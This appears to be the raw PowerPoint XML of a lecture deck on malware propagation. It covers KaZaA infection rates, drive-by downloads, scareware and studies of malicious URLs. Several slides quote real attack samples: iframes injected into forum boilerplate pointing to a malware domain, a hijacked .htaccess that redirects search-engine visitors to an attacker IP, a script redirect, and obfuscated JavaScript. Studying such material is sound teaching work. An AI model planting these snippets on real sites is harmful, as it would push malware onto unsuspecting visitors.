                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>17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Prevalence of Viruses in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>KaZaA</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/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r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2006 study of 500,000 KaZaA files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Looked for 364 patterns associated with 71 viruses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Up to 22% of all KaZaA files infected</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>52 different viruses and Trojans</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Another study found that 44% of all executable files on KaZaA contain malicious code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>When searching for “ICQ” or “Trillian”, chances of hitting an infected file are over </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
              </a:rPr>
              <a:t>70%</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Some infected hosts are active for a long time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>5% of infected hosts seen in February 2006 were still active in May 2006</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="354133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C952D7C4-F578-498F-9783-AE8391EB4185}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>18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92956"/>
            <a:ext cx="8229600" cy="1066800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Dangerous </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>KaZaA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Queries</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="33797" name="Picture 6" descr="sh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682750"/>
            <a:ext cx="605948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9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F80C4F6F-CD05-45A1-8052-D276D54D74AB}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>19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Stealth Techniques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Mutation: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>virus has multiple binary variants</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Defeats naïve signature-based detection </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Used by the most widespread viruses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Tanked: 62 variants, SdDrop: 14 variants</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Aliasing: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>virus places its copies under different names into the infected host’s sharing folder</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>“ICQ Lite .exe”, “ICQ Pro 2003b.exe”, “MSN Messenger 5.2.exe”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35028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4A268E0-1982-4916-BA05-0991CD2A8AA4}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>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 smtClean="0"/>
              <a:t>Malware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smtClean="0"/>
              <a:t>Malicious code often masquerades as good software or attaches itself to good software</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Some malicious programs need host programs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Trojan horses, logic bombs, viruses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Others can exist and propagate independently</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Worms, automated viruses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Many infection vectors and propagation methods</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Modern malware often combines trojan, rootkit, and worm functionality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3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365BFC2E-7673-4FAC-AAA8-980D1B4C414C}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>20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592319"/>
            <a:ext cx="8229600" cy="1066800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Propagation via Websites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smtClean="0"/>
              <a:t>Websites with popular content</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Games: 60% of websites contain executable content, one-third contain at least one malicious executable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Celebrities, adult content, everything except news</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Malware in 20% of search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 smtClean="0"/>
              <a:t>   results for “Jessica Biel”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 smtClean="0"/>
              <a:t>   (2009 McAfee study)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Most popular sites with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/>
              <a:t>   malicious content (Oct 2005)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Most are variants of the same few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/>
              <a:t>   adware applications (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>WhenU</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, etc.)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="35845" name="Picture 6" descr="s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689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AutoShape 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5654540" y="5243423"/>
            <a:ext cx="800100" cy="304800"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 65625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pic>
        <p:nvPicPr>
          <p:cNvPr id="35847" name="Picture 7" descr="j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3817189"/>
            <a:ext cx="1296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FA5D3C51-0AAE-420D-855A-484B4D18345D}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>21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title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="445698" y="717042"/>
            <a:ext cx="8229600" cy="1066800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Malicious Functionality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62600" cy="4953000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Adware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Display unwanted pop-up ads</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Browser hijackers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Modify home page, search tools, redirect URLs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Trojan downloaders</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Download and install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/>
              <a:t>   additional malware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Dialer (expensive toll numbers)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Keylogging</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="36869" name="Picture 7" descr="s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905000"/>
            <a:ext cx="32131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8" descr="s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2838"/>
            <a:ext cx="44196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5702300" y="2895600"/>
            <a:ext cx="3213100" cy="5286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DDD173C-EC65-4527-ABC4-A649A0984944}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>22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Drive-By Downloads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r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Website “pushes” malicious executable to user’s browser with inline JavaScript or pop-up window</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Naïve user may click “Yes” in the dialog box</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Can install malicious software </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" smtClean="0"/>
              <a:t>automatically</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> by exploiting bugs in the user’s browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>1.5% of URLs   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>- Moshchuk et al. study</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>5.3% of URLs   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>- “Ghost Turns Zombie”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>1.3% of Google queries   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>- “All Your IFRAMEs Point to Us”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Many infectious sites exist only for a short time, behave non-deterministically, change often</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3963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1066800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Obfuscated JavaScript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7616AD7D-3C59-493D-9245-59997E118EBF}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>23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8917" name="Content Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1943100"/>
            <a:ext cx="8178800" cy="44577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document.write(unescape("%3CHEAD%3E%0D%0A%3CSCRIPT%20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LANGUAGE%3D%22Javascript%22%3E%0D%0A%3C%21--%0D%0A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/*%20criptografado%20pelo%20Fal%20-%20Deboa%E7%E3o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%20gr%E1tis%20para%20seu%20site%20renda%20extra%0D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...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3C/SCRIPT%3E%0D%0A%3C/HEAD%3E%0D%0A%3CBODY%3E%0D%0A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%3C/BODY%3E%0D%0A%3C/HTML%3E%0D%0A"));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//--&gt;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solidFill>
                  <a:srgbClr val="7030A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437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50EDA6F4-517E-4965-BB54-1E8686CB8935}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>24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2282"/>
            <a:ext cx="8229600" cy="1066800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“Ghost in the Browser”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smtClean="0"/>
              <a:t>Large study of malicious URLs by Provos et al. (Google security team)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>In-depth analysis of 4.5 million URLs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>About </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>10% malicious</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Several ways to introduce exploits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Compromised Web server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>User-contributed content</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Advertising</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Third-party widgets</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14960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8F4EFFCB-88AA-48DC-8556-BD6A29445486}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>25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437072" y="533400"/>
            <a:ext cx="8229600" cy="1066800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Compromised Web Server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Vulnerabilities in phpBB2 and InvisionBoard enable complete compromise of the underlying machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>All servers hosted on a virtual farm become malware distribution vectors</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Example: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Exploit iframes inserted into copyright boilerplate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Test machine infected with 50 malware binaries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2671763" y="3414713"/>
            <a:ext cx="616743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&lt;!-- Copyright Information --&gt;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&lt;div align='center' class='copyright'&gt;Powered by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&lt;a href="http://www.invisionboard.com"&gt;Invision Power Board&lt;/a&gt;(U)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v1.3.1 Final &amp;copy; 2003 &amp;nbsp;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&lt;a href='http://www.invisionpower.com'&gt;IPS, Inc.&lt;/a&gt;&lt;/div&gt;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&lt;/div&gt;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&lt;iframe src='http://wsfgfdgrtyhgfd.net/adv/193/new.php'&gt;&lt;/iframe&gt;</a:t>
            </a:r>
          </a:p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&lt;iframe src='http://wsfgfdgrtyhgfd.net/adv/new.php?adv=193'&gt;&lt;/iframe&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1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F52D846F-66AC-4120-97E0-85563D61F8F6}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>26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Redirection Using .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>htaccess</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0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5105400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>After compromising the site, change .htaccess to redirect visitors to a malicious site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Hide redirection from website owner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Compromised .htaccess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/>
              <a:t>    frequently rewritten with new IP addresses,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/>
              <a:t>    restored if site owner deletes it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182688" y="3048000"/>
            <a:ext cx="48371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solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>RewriteEngine On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.*google.*$ [NC,OR]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.*aol.*$ [NC,OR]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.*msn.*$ [NC,OR]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.*altavista.*$ [NC,OR]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.*ask.*$ [NC,OR]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RewriteCond %{HTTP _ REFERER} .*yahoo.*$ [NC] </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="7030A0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RewriteRule .* http://89.28.13.204/in.html?s=xx [R,L]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6261100" y="3276600"/>
            <a:ext cx="2654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If user comes via one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these search engines…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41992" name="TextBox 7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6019800" y="3886200"/>
            <a:ext cx="1622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…redirect to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staging server</a:t>
            </a:r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6019800" y="4591050"/>
            <a:ext cx="25860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…which redirects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constantly changing set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of malicious domains</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="41994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486400" y="3581400"/>
            <a:ext cx="838200" cy="76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Straight Arrow Connector 11"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="41992" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="5486400" y="4181475"/>
            <a:ext cx="533400" cy="390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97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84AEFBF6-7942-4EC3-A12C-A0690CE9EBF5}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>27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User-Contributed Content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5105400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Example: site allows user to create online polls, claims only limited HTML support</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Sample poll: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pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Interpreted by browser as</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"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rgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>location.replace(‘http://videozfree.com’) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Redirects user to a malware site</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="43014" name="Picture 5" descr="ghostbrowser_Page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2532063"/>
            <a:ext cx="4468812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Social Engineering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if the user’s browser is up-to-date and not exploitable, can try to trick the user into “voluntarily” installing a malicious binary</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Example: website with thumbnails of adult videos</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Clicking on a thumbnail brings up a page that looks like Windows Media Player and a prompt:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“Windows Media Player cannot play video file. Click here to download missing Video ActiveX object.”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The “codec” is actually a malware binary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Fake antivirus (“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>scareware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>”)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>January 2009: 148,000 infected URLs, 450 domains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1DE07DD7-70FD-463F-B166-96428ED1CB02}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>28</a:t>
            </a:fld>
            <a:endParaRPr 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22D1F696-EB0D-4AE3-AEBF-81689A2B1EF5}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>29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Fake Antivirus</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="50180" name="Picture 2" descr="Screenshot of bogus Windows Recovery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056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364C7B7-89EB-488A-BFAA-254C1EBE4F2C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33424"/>
            <a:ext cx="8229600" cy="1066800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Remote Vulnerabilities (2001-06)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5125" name="Picture 4" descr="gee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0224"/>
            <a:ext cx="41910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ge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790825"/>
            <a:ext cx="4048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139825" y="4419600"/>
            <a:ext cx="228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 u="sng"/>
              <a:t>New</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t> vulnerabilities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283200" y="5486400"/>
            <a:ext cx="226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000"/>
              <a:t>Exploitable targets</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20094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09625"/>
            <a:ext cx="8229600" cy="1066800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Malware Binaries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 smtClean="0"/>
              <a:t>Adware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Trojan downloaders</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Download other malicious binaries, rootkits, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Steal financial information, email to attacker’s account</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Majority of exploits hosted on third-party servers, not directly on compromised sites</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Popular exploits are linked from over </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>10,000 URLs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Same binary is usually hosted at multiple sites</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Most URLs rarely change their binaries, but some switch as often as every hour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E84B8844-9B1E-4E41-8B6A-98107EDE6198}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>30</a:t>
            </a:fld>
            <a:endParaRPr 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08A1BA9-1DB4-47A9-B90E-459FFA003152}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
